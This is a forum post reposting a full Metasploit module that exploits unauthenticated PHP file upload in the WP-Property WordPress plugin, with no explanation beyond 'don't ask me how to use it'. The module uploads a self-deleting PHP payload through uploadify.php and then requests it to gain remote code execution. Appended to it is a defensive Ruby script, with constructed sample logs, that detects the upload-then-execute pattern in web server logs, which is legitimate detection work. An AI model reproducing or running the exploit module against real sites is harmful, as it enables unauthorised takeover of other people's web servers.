WordPress WP-Property PHP File Upload Vulnerability

Original poster | Posted on 2013-1-4 19:51:30
WordPress WP-Property PHP File Upload Vulnerability.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987' ],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Fingerprint only: the uploader script responding with 200 marks the
  # install as probably affected, nothing is written to the target here.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body matching what the uploadify front end would send
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # uploadify.php answers with the path of the stored file
    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
```
Don't ask me what this is or how to use it. I mean msf.
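A defender-side complement, added here as an example and not part of the original post or of the Metasploit module: a Ruby script that scans web-server access logs for the request pattern the module above produces, a POST to the plugin's uploadify.php followed by a GET of a freshly dropped .php file in the same uploadify directory from the same client. The log lines are constructed sample data; the /wordpress prefix and the 300-second correlation window are assumptions.

```ruby
# Added example (not from the original post or the Metasploit module):
# flag the WP-Property uploadify upload-then-execute pattern in access logs.
require 'time'

# Paths come from the module above; the /wordpress prefix is only an assumption
# made for the constructed sample log, the regexes accept any prefix.
UPLOADIFY_DIR = '/wp-content/plugins/wp-property/third-party/uploadify/'
UPLOADER      = %r{#{Regexp.escape(UPLOADIFY_DIR)}uploadify\.php(\?|\z)}
DROPPED_PHP   = %r{#{Regexp.escape(UPLOADIFY_DIR)}[A-Za-z0-9_-]+\.php(\?|\z)}

# Apache/nginx "combined" log format: ip - - [time] "METHOD path HTTP/x" status ...
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/

Hit = Struct.new(:ip, :time, :method, :path, :status)

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  Hit.new(m[1], Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'), m[3], m[4], m[5].to_i)
end

# Returns [[kind, ip, path], ...]. A POST to uploadify.php is reported on its own
# (the endpoint needs no authentication). A successful GET of a .php file in the
# same directory by the same client within `window` seconds is the execution step.
def detect(lines, window: 300)
  hits = lines.map { |l| parse_line(l) }.compact
  findings = []
  hits.each_with_index do |h, i|
    next unless h.method == 'POST' && h.path =~ UPLOADER
    findings << [:upload_attempt, h.ip, h.path]
    hits.drop(i + 1).each do |later|
      break if later.time - h.time > window
      next unless later.ip == h.ip && later.method == 'GET' && later.status == 200
      next unless later.path =~ DROPPED_PHP && later.path !~ UPLOADER
      findings << [:webshell_executed, later.ip, later.path]
    end
  end
  findings
end

# Constructed sample log (not real traffic): a probe, the upload, the execution,
# and an unrelated request from another client.
SAMPLE_LOG = [
  '203.0.113.7 - - [04/Jan/2013:19:51:30 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [04/Jan/2013:19:51:31 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [04/Jan/2013:19:51:32 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/kqzxw.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [04/Jan/2013:19:55:00 +0800] "GET /wordpress/?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'
]
detect(SAMPLE_LOG).each { |kind, ip, path| puts "#{kind}: #{ip} #{path}" } if $PROGRAM_NAME == __FILE__
```

The same two regexes can be dropped into a WAF or SIEM rule; the correlation step is what separates a scanner probing for uploadify.php from an actual compromise.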